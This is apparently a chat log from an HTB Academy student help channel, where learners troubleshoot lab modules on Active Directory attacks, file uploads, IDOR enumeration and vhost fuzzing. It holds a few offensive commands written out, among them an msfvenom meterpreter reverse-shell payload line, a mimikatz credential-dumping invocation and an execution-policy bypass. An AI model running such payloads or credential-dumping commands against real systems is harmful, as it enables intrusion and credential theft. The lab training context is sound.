
there's nothing wrong with the target

he posted the results of netstat and found the service running so.. it's working

yep

¯_(ツ)_/¯

did he delete all his messages?

soooooo i tried to RDP into the system target and it said trust relationship between workstation and primary domain failed....should i contact htb or find a way around?

Try another region

is the web proxies module a little out of date? i don't think the ZAP tutorial matches the current version of ZAP

could just be a me thing tho ;p

you could update ZAP

it works well enough; things are shuffled around a bit

they're saying the version in the examples doesn't match the current version, not the other way around

OH. ima stay outa that

right on, i'll figure it out. ty

sometimes a quick google helps figure it out ¯_(ツ)_/¯

/nods

i don't generally recall though anything that was like wildly different

just a bit of ui shuffle, for the most part

You login using ssh and then connect to ftp locally with this command, the exercise is badly worded hence if a newbie is trying it they won't understand:
ftp ftp://username:'password'@localhost

you don't need to do all that

just ftp ftpuser@localhost then input password and hit enter

i mean it's completely followable with the examples

That's what I said but you only do that after logging in via ssh so yes you need to do that and not how the exercise is worded

Hence again bad learning experience,

You do realize the command I mentioned is a one-liner, right?

To not be prompted for password

Thanks that worked.

literally from that section

once inside the system

using netstat (within the ssh session)

Okay tried the exercise again, I think I got tunneled vision. I apologize

https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-i-hate-your-deck-reading-the-card-gif-22381436

it happens ¯_(ツ)_/¯

but just be mindful; if you're having issues re-read to make sure you didn't miss anything -- don't skim

i've missed the obvious text before

Yeah I think it was also because the questions at the end ask for ftpuser hence made my brain think something else while on the exercise you are doing with a different user

you can follow along with the exercise with ftpuser

You can always add it to the #1234357888114364508 if you think others will have trouble with it. If you are doing a path or even just modules, I'm fairly certain there are recommendations prior to starting, i.e., Linux Fundamentals as an example, which would likely provide folks new to this stuff, with a foundation that would likely help with that module, i.e., localhost things.

Glad you got it sorted out.

jeepers. i had to read through some docs just to get Invoke-ShareFinder to work lol

Hello

I m doing
Attacking Common Applications - Skills Assessment II

When i m trying to fing the vhosts, its not working for me can anyone help me?

gobuster vhost -u inlanefreight.local -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 -k -q

cat /etc/hosts | tail -1
10.129.201.90 inlanefreight.local

It is giving me some random founds not the one which is needed

gobuster vhost -u inlanefreight.local -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 -k -q
Found: 1 Status: 400 [Size: 436]
Found: 11192521403954 Status: 400 [Size: 436]
Found: 11192521404255 Status: 400 [Size: 436]
Found: gc._msdcs Status: 400 [Size: 436]
Found: 2 Status: 400 [Size: 436]
Found: 11285521401250 Status: 400 [Size: 436]
Found: 2012 Status: 400 [Size: 436]
Found: 11290521402560 Status: 400 [Size: 436]
Found: 123 Status: 400 [Size: 436]
Found: 2011 Status: 400 [Size: 436]
Found: 3 Status: 400 [Size: 436]
Found: 4 Status: 400 [Size: 436]
Found: 2013 Status: 400 [Size: 436]
Found: 2010 Status: 400 [Size: 436]
Found: 911 Status: 400 [Size: 436]
Found: 11 Status: 400 [Size: 436]
Found: 24 Status: 400 [Size: 436]
Found: 10 Status: 400 [Size: 436]
Found: 7 Status: 400 [Size: 436]
Found: 99 Status: 400 [Size: 436]
Found: 2009 Status: 400 [Size: 436]
Found: www.1 Status: 400 [Size: 436]
Found: 50 Status: 400 [Size: 436]
Found: 12 Status: 400 [Size: 436]
Found: 20 Status: 400 [Size: 436]
Found: 2008 Status: 400 [Size: 436]
Found: 25 Status: 400 [Size: 436]
Found: 15 Status: 400 [Size: 436]
Found: 5 Status: 400 [Size: 436]
Found: www.2 Status: 400 [Size: 436]
Found: 13 Status: 400 [Size: 436]
Found: 100 Status: 400 [Size: 436]
Found: 44 Status: 400 [Size: 436]
Found: 54 Status: 400 [Size: 436]
Found: 9 Status: 400 [Size: 436]
Found: 70 Status: 400 [Size: 436]
Found: 01 Status: 400 [Size: 436]
Found: 16 Status: 400 [Size: 436]
Found: 39 Status: 400 [Size: 436]
Found: 6 Status: 400 [Size: 436]
Found: www.123 Status: 400 [Size: 436]

try using ffuf

or wfuzz

I am trying ffuf as well its taking 3req/sec

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://IP -H 'Host: FUZZ.target.htb'

Its really very very slow

It shouldn’t be

Thanks I will see what i can do 😉

hi, what sections should I reread for each of the three Password Attack Labs at the end of Password Attacks module?

I mean I know the whole module but what sections corresponds to each Lab?

That would be spoiling the skill assessments for yourself

Or have u already finished it and just asking?

oh I see so the skill assessments assume I'm rereading previous sections

ok

thanks I'll just look myself them

I don't want to spoil it.

I wanted to review the material so I can do assessment but if the assessment is just essentially the whole module over again I guess I'll just reread

thank you

ok ya I didn't realize that I thought the skill assessments would require me to figure out how to hack stuff based on material from module and not necessarily just have me rehash the whole module

ok

I will just do the skill assessments tomorrow then

should I just reread entire module?

in like two days?

just to review everything?

Yeah you should be able to complete it using what you learned

ok

so does that mean rereading is a good idea to reinforce?

You don’t have to memorize and remember everything, that’s what notes are for

Just know when and what tool to use in a situation

I took very detailed notes

The modules should prepare you

ok

I'll do it tomorrow then

skill assesment is just to confirm you have learned and are able to use what you have learned

ok

I need help with the web attacks module mass idor enumeration, I tried creating the bash script in nano and then running it and I'm not getting any response or downloading any files it just hangs there

iirc the example script had one difference in the request compared to the question

You will have to edit it a little

well im not getting any responses regardless

like its not enumerating the pdf files either

im not sure if theres something wrong with how im running the script or something

ok so I put the uid in the post parameter and changed the file extension to .txt and still didnt get the flag

i dont understand what im doing wrong here. I'm able to download all the pdfs but when I change the file extension to .txt I get nothing

Dm me the script

I don’t think the extension mattered since it used regex to grab anything after

But I can’t remember exactly what the script looked like ngl

can anyone help me understand where my mind should be on kernel exploit section of linux priv esc?

I don't know what im doing wrong 😦

i dmd you the script. im not sure what im doin wrong

im able to download all the pdf files

and I changed extension to .txt

i got it. I had to use the verbose setting for wget and then curl the url directly to read the flag

CAN SOMEONE PLEASE HELP ME RECOVER MY YAHOO ACCOUNT

yahoo can. reach out to them.

I'm doing skill assessment 1 for active directory enumeration and attacks and when i try to run an msfvenom meterpreter/reverse_tcp payload on MS01 i get "The specified executable is not a valid application for this OS". I get this error message with both 32 and 64 bit executables

sounds like you generated the payload incorrectly, make sure you choose windows and not arm

im generating the payload with

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.6.100 LPORT=8080 -f exe -o reverse.exe

the ip is weird because im doing it through ligolo listener

actually, i just realised that im getting connection refused

Why are you using both ligolo and meterpreter?

i wasnt planning on using meterpreter but the evil-winrm shell is giving me problems, mimikatz just goes wild and floods the terminal with prompts

That's normal, it's why on winrm you need to throw the command at it instead of trying to run it from within

You can just type the commands like this: mimikatz.exe “privilege::debug” exit

^

ah i see, thanks!

It's mostly because winrm sucks ass but evil-winrm is the best we got i suppose

would this be happening becuase the executable reaches out to msf to get the full payload, but msf doesnt know theres a proxy and so gives it my local ip which the remote host cant connect to?

One time I had to reinstall my OS because it wasn't seeing that openssl was installed

Nope the payload is generated with the exact specs you give it

In the winrm/ps prompt ->
set-executionpolicy bypass -scope process

Also connection refused; likely some firewall shenanigans on your end

Or on the middle host

hm ok, i guess metasploit doesn't mix too well with ligolo

What is the FQDN of the host where the last octet ends with "x.x.x.203"?Does any know how to this question I'm stuck with it -- DNS -- Footprinting -- Penetration path

It does just fine you just have to configure things correctly. https://youtu.be/EvENMuvxPW0?si=87pwPRAZQgln0krV

ok bruh somethings definitely up. I know i could progress without it by using mimikatz but i want to get this working.
I set the execution policy to bypass and both the system and payload are x64

iirc you need to recursively query the subdomains as well, one of them will have the ip ending in .203

Subdomains of Subdomains

@tulip hearth module and section name?

module/57/section/503

im trying to bruteforce the site but idk which user to use

should i also use a wordlist for the username?

cuz i kept trying with basic-auth-user as username

oh yeah i remember module 57 section 503

what a module/section

one of a kind

but i think i know which one it is lol

Login Brute Forcing

Basic HTTP Authentication

I just redid this SA.
I would say to not use MSF, but that's on me... Idk

All the lateral you need and the sessions you will need you can use evil-winrm, Impacket and Netexec

never understood why some people say the module and section numbers instead of their names

Cause you can paste in the URL

Because they just copy the url endpoint

ugh the rdp is failing again

But I find it easier to reference via section and module name as well

but like.. i dont wanna paste that into the URL lol

and i'm on mobile too

Name and section helps from my notes perspective

for referencing notes too, i don't have the module and section numbers there either

But atm I don't have access to them

So i gotta rely on my pea sized brain

This is because WinRM uses HTTP/HTTPS to pass commands.... You can try setting the commands you want to pass all in the parameters and then 'exit'

But you can go through this SA with both MSF, mimikatz, evil-winrm, netexec and whatever you choose

I went through my old notes and I used MSF without issues

Yeah they're mixing msf for shell and ligolo for pivot

¯_(ツ)_/¯

I can check if I used MSF in the attack host set by the module but most of the stuff in Academy has the routing setup as to enable getting a callback in your machine

if my certificate verification failed for the RDP after switching regions should i just wait? i swapped regions earlier and it worked for a little bit but now it just refuses to work lol

Have you tried specifying the /cert-ignore flag?

like the error message it gives me? such as

In the rdp command throw /cert-ignore

oki doki

_<

change regions

i did and that solution stopped working me :/

When you change regions you need to stop your vpn and download/run a new one

And terminate -> reset the target

well i use the pwnbox so it gives me that pop up telling me that its going to do that. ok ill terminate the target

Pwnbox region != vpn region

OOOOH

annd the same error popped up. thanks yall for the help

not in an insincere way. i figure its something going on that im not seeing quite clearly yet

its the region

did you change regions or servers? change regions

i swapped the vpn region to USacademy1 from USacademy6

yeah that's the same region

change regions

once i get past the error connections i run into the trust issue with the primary domain after putting /cert-ignore in the CLI

i put the vpn server at EU academy 3

the trust relationship isn't related to the certificate

it's a problem with the domain and the computer, not something you can fix

someone else had the same issue earlier, changing regions fixed it. i'd suggest disconnecting from the eu vpn, de-spawning the target, doing a hard refresh on the page (ctrl+shift+r), re-spawning the target, and waiting 3-5 mins and try again

ok

yesss that fixed it thank you thank you

I'm new to hackthebox

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I have been trying to load this directory from last night but it doesn't load. Can anyone help please

I even tried switching vm but its not working

yep, i restarted the lab and it magically worked now 😕

hey

Kerberos Attacks > Unconstrained Delegation - Computers

i have ticket

Client: DC01$ @ INLANEFREIGHT.LOCAL
Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL

but when i want to access i got

C:\Tools>net view \DC01\C$\Unconstrained
System error 5 has occurred.

Access is denied.

Hi. In the "File Inclusion" module, the following question is not working with the expect wrapper. The other two wrappers work fine. The command should work as shown in image2 but I don't see the result of "id" only HTML output.**

hi and merry Christmas, first post here, anybody know why this doesn't show up in Burp proxy (it's a tmp HTB academy module)?
nmap --proxies http://127.0.0.1:8080 -p43343 -Pn -sC 94.237.61.84
proxychains nmap -p43343 -Pn -sC 94.237.61.84

But this does:
proxychains curl 94.237.61.84:43343

/etc/proxychains.conf
uses everything default, except:
#Quiet mode (no output from library)
quiet_mode
#socks4 127.0.0.1 9050
http 127.0.0.1 8080

Hello. I'm currently at Linux Fundamentals / Working with Web Servers and I don't understand some things about it. What exactly is a web server? Is it just a package that, when installed, kind of represents your IP as a web page? Why are there so many different web servers? And how do I "Find a way to start a simple HTTP server inside Pwnbox or your local VM using "php". Submit the command that starts the web server on the localhost (127.0.0.1) on port 8080."? Isn't PHP, like, a language? What's next, starting a web server from Vim?

You can start a HTTP server with PHP, also with other languages

Hi there, I am new at HTB academy. I started a learning path. In the learning module I am doing right now I only have the option to user Pwnbox but I would like to use VPN instead. I apparently do not have the VPN option as stated here: https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn
Doe not all learning modules have a VPN package or is this a "subscription" thing? Thanks and regards

A web server is software that listens for client requests and serves web content, acting as the foundation for hosting websites and web apps.

The variety of web servers exists because different tasks and environments demand unique features, performance optimizations, or integrations.

Thanks but how exactly? I found php -S localhost:8080 but it doesn't work as answer

hmmm I haven't done the module personally. But you can dm me the question, and we can take a look together

I already said the question though.

have youi tried 127.0.0.1 instead of localhost?

Oh it's that simple. Thanks, it works.

haha no worries

hey guys, i got a question about the dancing module in starting point

Best to ask in #starting-point

oh k

thx

the report in AEN is giving me a headache lol.
it requires so much work.

when I finish it can I send it here to get feedbacks? or not allowed?

as this is the first time I write a report and I need as much feedback as possible before the actual exam.

Unfortunately this is not allowed

Injection attacks LDAP authentication bypass use all veriations mentioned in section still can't figure out.

And why we are provided with the creds at the first place.

What is the question?

why though? it's a module not an exam

Because it's a tier 2 module, and sharing the report is the same as sharing a writeup

in HTB sharing writeups for tier 2 modules is not allowed? this is new knowledge.
thanks.

Yes, it's literally against ToS

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

Currently working through the Hacking Wordpress Skills Assessment. Using the techniques taught in the module have given errors, as the target that spawns is not detected as a Wordpress website by wpscan. Is anyone here able to give guidance on this?

Take a look at all the links. Not every website has to be a Wordpress

Use netcat

thanks

I believe the --script banner may also work

i had completely ignored the rest of the things and went too fast🤦‍♂️

Also careful sharing answers 😉

oh yeah sorry

Hey in dacl attacks 2 skill assesment proxychains dosent work any idean whats happening?

Login as admin using LDAP authentication bypass.

yep it does

Even though chisel is connected

And proxychains configured

I still get timeout

Some of the modules had timeout error when using proxychains.
It was resolved running with sudo

You can do it without the tunneling or setting it with ligolo

Ill try thanks

im doing win priv esc citrix section, anyone know why i still cant access internal resource after tunneling with ligolo?

its ok dumb ass me put the wrong ip in etc host

Lol i don't even recall i used pivoting in this section

For the Active Directory Path, I am having trouble answering the question for BlueHound. BlueHound does not return any data related to domain users with a path to domain admins? Any hints or nudges. I've followed the instructions for BlueHound and try to run custom cypher queries on bloodhound

i cant connect the citrix environment to my smb

Using BlueHound custom dashboard. What percentage of users have a path to Domain Admins? (Do not include %)

can anyone help out on the SCCM Auditing module?
I'm using sccmhunter, but not getting any info back on certain attributes - used all the different sets of credentials previously obtained, just can't figure out how to return info such as if the computer is an SMSProvider or not

Could you be a bit more presice? What are you executing? Do you have sufficient permissions?

If bloodhound is not getting data ill suggest 2 things:

First, check user credentials are valid
Second, go with sharphound, I really dont like the py version for linux, it misses stuff

I'm having the same problem, as well. Even when I copy and paste

for win priv esc citrix section, how can i transfer the powerview into citrix environment?

in the penetration tester job role path in the "Practice" Module:
2x Modules
3x Retired Machines
5x Active Machines
1x Pro Lab / Endgame

So for every 2 Modules it is recommended to complete 3 retired machines,5 active and one Pro Lab. Did I understand this correctly ?

It's explained in the module itself, read it it was through MS Paint from what i remember so you can use that as a search keyword.

cant access i already tried that UNC method

You probably did something wrong as it worked for me.

i got it thanks

no problem.

facing same issue, updated /etc/hosts with internal names as suggested - no luck :/

nvm its fixed

OK. I feel like I'm taking crazy-pills: working on the skills assessment for "File Upload Attacks". I've exfiltrated the source files, bypassed the allow and deny lists, I'm looking at the code as to where it's storing the file after it's uploaded but when I try to browse to it, the server is throwing 'not-found' errors... Am I missing something?

beyond "where the file is located"

Did you pay attention to how the file gets formatted before it's uploaded?

Doesn’t the rdp machine have it?

OK. I'll dig into that. Thanks.

are you referring to how it gets named?

Yep

The lab wants you to use bluehound and they give you the account and the data. Bluehound just won't correctly populate with it.

Im having trouble with this last question on the Windows Attacks & Defense Credentials in Object Properties. Im looking at the logs and i still cant find the TargetsID in the security logs i found a work around all good

Yes. I saw it and have taken that into account. Still 'not found'.

BlueHound uses sharp hound and a gui to grab the data and create dashboards. Some dashboards work but the ones I need do not.

It applied format_file

Don't forget the _

@fathom pendant yep, I've got that, too. Can I DM you directly about this?

Are you sure you're looking at the right directory

And no

I just did this one, what issue are you encountering?

I think that's where my confusion is coming in. I'm reading through the source code and it says that it's in ./upload_location_here/ suggesting that it's a subdirectory of the directory that the file is executing in, correct?

Hey, so I'm new here and I've got a question. I'm doing starting point machines and i tried connecting via openvpn and it seems my connection is working, but whenever i try to do something with a machine, be it nmap or whatsoever, it says that "host seems down" every time. I'd really appreciate any help

it seems that every starting point machine is down

what IPs are you seeing if you run "ip -4 a" ?

It's in the webroot iirc

#starting-point

Ight sorry ima go there now

Ya hahaha I thought too much

For several days, I've been experiencing frequent interruptions and disconnections within the 'Active Directory Enumeration and Attacks' module. This issue manifests on multiple machines within the module, with 'ACADEMY-EA-MS01' being a prominent example. I've tested with three major RDP clients (rdesktop, xfreerdp, and Remmina) and renewed/reset my VPN connection multiple times, but the problem persists. Since these issues are also occurring within the Parrot-pwnbox,. Is anyone else currently experiencing similar issues?

Reach out to support, switch regions completely [EU to US academy 1-5/6 or vice versa]

Make sure tcp download on your vm

The examples don't always match the exercises. The examples can be there to show a process

If you read the question it refers to something more specific (and more likely to be linux)

for the windows attacks and defense print spooler & NTLM relaying im getting an error from the impacket-relayx and its not working...im running the script from the kali box and then when i run Dementor on the kali box from the Tools directory im running into errors sigh.....figured it out. i manually typed out the password.

Hi I am not sure if this is the right channel, but I have reached the point where my monthly subscriptions has unlocked all academy modules on my path with cubes (I have some left over too) if I stop my monthly sub or reduce it do I still keep the content or do I need to keep it running?

you keep the modules you completed

You get to keep modules unlocked with cubes (regardless of whether you've completed them). However, modules unlocked via a subscription need to be completed in order to keep them.

Having Troubles Understanding this section:
Information Gathering - Web Edition
DNS Zone Transfers
How is this Formated? What goes where?

dig axfr @nsztm1.digi.ninja zonetransfer.me

Dig [query] [domain] @ nameserver

The name server for the target?

For the transfer?

The name server can also be an ip

So it would be inlanewhatever.com @ IPADDRESS

Or .htb

Also no space between, I just put a space because some fucker's username is nameserver, so it'll fuck up

Lmao

Thank you. That helps a lot.

Context and question matters

on external information gathering module, on the last question in what format should the vhost be

since i found around 10 and no one works

*attacking enterprise networks module

I wouldn't worry about answering the questions until you achieve domain compromise

External info gathering section btw

Not module

but it is a question needed to go forward

it is the last in this section

Doing the module blind is best to make sure you actually retained info and have good notes and methodology

Which means not reading the module or doing the questions

As the questions can be leading

tf

what did you just say

The module itself is a walkthrough

oh

Hi

It means [if you're doing the cpts path] you should have all the skills necessary to achieve domain compromise, then go back and answer questions

Friends, I have a question. I accidentally subscribed to HTB for a year. I intended to do so for a month. Is there a way to cancel this?

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

lol

Or if it's not academy

Oof cool down on bot

But still green bubble on the page

so first hack it?

but to what extent

Yep, get domain compromise

Domain admin/admin on DC

i see

i havent done everyhting up to this though

should i do the other midules first

i have two i havent done

Well AEN is the capstone module for the cpts path

What modules did you skip?

dics and reporting

file inclusion

the rest are done

You should probably do the file inclusion one

:)

ok

but cani still do this first

Docs & reporting is good if you want to do a report as you go

it is painful to stop

You may run into something on AEN that's related to file inclusions

doing htb as hobby not gonna burden myself with this crap

i mean just for the vhosts thing

Well if you want to do the cert it's best not to have your first time writing a report be for the exam